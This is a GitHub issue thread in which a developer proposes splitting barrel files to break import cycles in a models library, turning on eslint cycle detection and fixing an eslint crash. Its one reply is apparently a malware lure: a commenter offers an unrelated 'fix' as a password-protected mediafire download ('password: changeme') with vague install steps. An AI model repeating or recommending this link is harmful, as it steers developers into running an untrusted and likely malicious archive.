### ISSUE TITLE
Break up cycles in barrel files and turn on cycle detection in eslint.

### ISSUE THREAD

**Issue by burtonator** [hicommonwealth/commonwealth#9095]
## Describe the bug

We cycles in our code. Importantly, in the models lib.

The cycle/import eslint plugin / rule can find them for us but it requires us to break apart our code.

I talked to @kurtisassad and @Rotorsoft about this and we've come to consensus that we can break up our libs.

Also, turn on eslint rule for tests.  

Also, I think eslint is crashing on my (burtonator) workstation so that will need to be resolved too.

### Initial conditions

**Environment:** 

**Branch/Release version:** 

**Browser:** 

**Wallet:**

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
